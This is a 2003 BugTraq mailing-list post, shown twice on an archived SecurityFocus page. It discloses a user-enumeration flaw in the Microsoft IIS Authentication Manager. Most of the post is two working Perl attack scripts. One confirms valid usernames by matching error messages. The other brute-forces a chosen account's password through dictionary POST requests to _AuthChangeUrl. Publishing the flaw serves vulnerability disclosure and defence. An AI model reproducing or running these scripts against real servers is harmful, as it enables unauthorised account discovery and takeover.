BugTraq
Back to list
|
Post reply
Microsoft IIS Authentication Manager Account Conformation Vuln?
May 03 2003 07:58AM
JeiAr (jeiar kmfms com)
Let me start off by saying that im not sure if this already exists,
but i have never heard of it and neither has anyone i asked. So i'm
SURE you all know about the IIS Authentication Manager Vuln
(aexp4b.htr) and it can let people possibly bruteforce and change
local account info on a Windows box. Well, while messing with a IIS
machine this weekend I noticed that it also gives error messages that
basically let you verify whether or not a user account exists. For
example, if a user doesn't exist it says "The user name could not
be found." and if the user does exist it will say "The specified
network password is not correct" Anyway, I don't know if im the first
person to notice this, but I have never heard of it. Also attached are
two quick and dirty perl scripts i threw together to automate both the
process of identifying an account and then bruteforcing it. Anyway,
anyone ever notice or hear of the confirming if an account exists thing?
########################################################################
##
#################
# Miscrosoft IIS Authentication Manager BruteForce Tool - By JeiAr
http://www.gulftech.org
########################################################################
##
#################
# This tool can be used to brute force user accounts via dictionary
attack on the Microsoft
# IIS Authentication Manager. More details here
http://www.securityfocus.com/archive/1/8515
########################################################################
##
#################
use LWP::UserAgent;
########################################################################
##
#################
# Time to create the new LWP User Agent, Clear the screen, And print out
the scripts header
########################################################################
##
#################
$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;
########################################################################
##
#################
# Gather all user inputted data. Such as the domain name, host and
location of the wordlist
########################################################################
##
#################
print "Host: ";
$host=<STDIN>;
chomp $host;
print "Domain: ";
$domain=<STDIN>;
chomp $domain;
print "Account: ";
$account=<STDIN>;
chomp $account;
print "Word List: ";
$list=<STDIN>;
chomp $list;
########################################################################
##
#################
# Opens the wordlist and puts the data into an array. afterward setting
the count variables
########################################################################
##
#################
open (DATAFILE, "$list");
@datafile = <DATAFILE>;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;
&space;
print "Cracked Accounts\n";
print "----------------\n";
########################################################################
##
#################
# Creates the HTTP request, Checks the responses, then prints out the
username if it exists
########################################################################
##
#################
while ($count < $length) {
$password = (@datafile[$count]);
my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
$req->content_type('application/x-www-form-urlencoded');
$req->content
("domain=$domain&acct=$account&old=$password&new=$password&new2=$passwor
d"
);
my $res = $ua->request($req);
$pattern = "Password successfully changed";
$_ = $res->content;
if (/$pattern/) {
print "$account : $password\n";
last if (/$pattern/);
}
$count++;
}
########################################################################
##
#################
# Thats all folks. Prints out the final details and footer. Rest is just
the subroutines :)
########################################################################
##
#################
&space;
&footer;
sub header {
print "IIS Auth Manager Brute Forcing Tool By JeiAr
[http://www.gulftech.org] \n";
print "-------------------------------------------------------------------
--- \n";
}
sub footer {
print "Session Results:\n";
print "--------------------\n";
print "Number Of Words : $length \n";
print "Number Of Tries : $count \n";
}
sub space {
print "\n" x2;
}
########################################################################
##
#################
# Miscrosoft IIS Authentication Manager Discovery Tool - By JeiAr
[http://www.gulftech.org]
########################################################################
##
#################
# This tool is used to find existing user accounts via a dictionary
attack on the Microsoft
# IIS Authentication Manager. More details here
http://www.securityfocus.com/archive/1/8515
########################################################################
##
#################
use LWP::UserAgent;
########################################################################
##
#################
# Time to create the new LWP User Agent, Clear the screen, And print out
the scripts header
########################################################################
##
#################
$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;
########################################################################
##
#################
# Gather all user inputted data. Such as the domain name, host and
location of the wordlist
########################################################################
##
#################
print "Host: ";
$host=<STDIN>;
chomp $host;
print "Domain: ";
$domain=<STDIN>;
chomp $domain;
print "Account List: ";
$list=<STDIN>;
chomp $list;
########################################################################
##
#################
# Opens the wordlist and puts the data into an array. afterward setting
the count variables
########################################################################
##
#################
open (DATAFILE, "$list");
@datafile = <DATAFILE>;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;
&space;
print "Verified Accounts\n";
print "-----------------\n";
########################################################################
##
#################
# Creates the HTTP request, Checks the responses, then prints out the
username if it exists
########################################################################
##
#################
while ($count < $length) {
$account = (@datafile[$count]);
my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
$req->content_type('application/x-www-form-urlencoded');
$req->content("domain=$domain&acct=$account&old=&new=&new2=");
my $res = $ua->request($req);
$pattern = "network password is not correct";
$_ = $res->content;
if (/$pattern/) {
print "$account\n";
$found++;
}
$count++;
}
########################################################################
##
#################
# Thats all folks. Prints out the final details and footer. Rest is just
the subroutines :)
########################################################################
##
#################
&space;
&footer;
sub header {
print "IIS Auth Manager User Discovery Tool By JeiAr
[http://www.gulftech.org]\n";
print "-------------------------------------------------------------------
----\n";
}
sub footer {
print "Enumeration Results:\n";
print "--------------------\n";
print "Number Of Tries : $length \n";
print "Confirmed Users : $found \n";
}
sub space {
print "\n" x2;
}
I hope the formatting of this message doesn't get trashed :o)
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Let me start off by saying that im not sure if this already exists,
but i have never heard of it and neither has anyone i asked. So i'm
SURE you all know about the IIS Authentication Manager Vuln
(aexp4b.htr) and it can let people possibly bruteforce and change
local account info on a Windows box. Well, while messing with a IIS
machine this weekend I noticed that it also gives error messages that
basically let you verify whether or not a user account exists. For
example, if a user doesn't exist it says "The user name could not
be found." and if the user does exist it will say "The specified
network password is not correct" Anyway, I don't know if im the first
person to notice this, but I have never heard of it. Also attached are
two quick and dirty perl scripts i threw together to automate both the
process of identifying an account and then bruteforcing it. Anyway,
anyone ever notice or hear of the confirming if an account exists thing?
########################################################################
##
#################
# Miscrosoft IIS Authentication Manager BruteForce Tool - By JeiAr
http://www.gulftech.org
########################################################################
##
#################
# This tool can be used to brute force user accounts via dictionary
attack on the Microsoft
# IIS Authentication Manager. More details here
http://www.securityfocus.com/archive/1/8515
########################################################################
##
#################
use LWP::UserAgent;
########################################################################
##
#################
# Time to create the new LWP User Agent, Clear the screen, And print out
the scripts header
########################################################################
##
#################
$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;
########################################################################
##
#################
# Gather all user inputted data. Such as the domain name, host and
location of the wordlist
########################################################################
##
#################
print "Host: ";
$host=<STDIN>;
chomp $host;
print "Domain: ";
$domain=<STDIN>;
chomp $domain;
print "Account: ";
$account=<STDIN>;
chomp $account;
print "Word List: ";
$list=<STDIN>;
chomp $list;
########################################################################
##
#################
# Opens the wordlist and puts the data into an array. afterward setting
the count variables
########################################################################
##
#################
open (DATAFILE, "$list");
@datafile = <DATAFILE>;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;
&space;
print "Cracked Accounts\n";
print "----------------\n";
########################################################################
##
#################
# Creates the HTTP request, Checks the responses, then prints out the
username if it exists
########################################################################
##
#################
while ($count < $length) {
$password = (@datafile[$count]);
my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
$req->content_type('application/x-www-form-urlencoded');
$req->content
("domain=$domain&acct=$account&old=$password&new=$password&new2=$passwor
d"
);
my $res = $ua->request($req);
$pattern = "Password successfully changed";
$_ = $res->content;
if (/$pattern/) {
print "$account : $password\n";
last if (/$pattern/);
}
$count++;
}
########################################################################
##
#################
# Thats all folks. Prints out the final details and footer. Rest is just
the subroutines :)
########################################################################
##
#################
&space;
&footer;
sub header {
print "IIS Auth Manager Brute Forcing Tool By JeiAr
[http://www.gulftech.org] \n";
print "-------------------------------------------------------------------
--- \n";
}
sub footer {
print "Session Results:\n";
print "--------------------\n";
print "Number Of Words : $length \n";
print "Number Of Tries : $count \n";
}
sub space {
print "\n" x2;
}
########################################################################
##
#################
# Miscrosoft IIS Authentication Manager Discovery Tool - By JeiAr
[http://www.gulftech.org]
########################################################################
##
#################
# This tool is used to find existing user accounts via a dictionary
attack on the Microsoft
# IIS Authentication Manager. More details here
http://www.securityfocus.com/archive/1/8515
########################################################################
##
#################
use LWP::UserAgent;
########################################################################
##
#################
# Time to create the new LWP User Agent, Clear the screen, And print out
the scripts header
########################################################################
##
#################
$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;
########################################################################
##
#################
# Gather all user inputted data. Such as the domain name, host and
location of the wordlist
########################################################################
##
#################
print "Host: ";
$host=<STDIN>;
chomp $host;
print "Domain: ";
$domain=<STDIN>;
chomp $domain;
print "Account List: ";
$list=<STDIN>;
chomp $list;
########################################################################
##
#################
# Opens the wordlist and puts the data into an array. afterward setting
the count variables
########################################################################
##
#################
open (DATAFILE, "$list");
@datafile = <DATAFILE>;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;
&space;
print "Verified Accounts\n";
print "-----------------\n";
########################################################################
##
#################
# Creates the HTTP request, Checks the responses, then prints out the
username if it exists
########################################################################
##
#################
while ($count < $length) {
$account = (@datafile[$count]);
my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
$req->content_type('application/x-www-form-urlencoded');
$req->content("domain=$domain&acct=$account&old=&new=&new2=");
my $res = $ua->request($req);
$pattern = "network password is not correct";
$_ = $res->content;
if (/$pattern/) {
print "$account\n";
$found++;
}
$count++;
}
########################################################################
##
#################
# Thats all folks. Prints out the final details and footer. Rest is just
the subroutines :)
########################################################################
##
#################
&space;
&footer;
sub header {
print "IIS Auth Manager User Discovery Tool By JeiAr
[http://www.gulftech.org]\n";
print "-------------------------------------------------------------------
----\n";
}
sub footer {
print "Enumeration Results:\n";
print "--------------------\n";
print "Number Of Tries : $length \n";
print "Confirmed Users : $found \n";
}
sub space {
print "\n" x2;
}
I hope the formatting of this message doesn't get trashed :o)
[ reply ]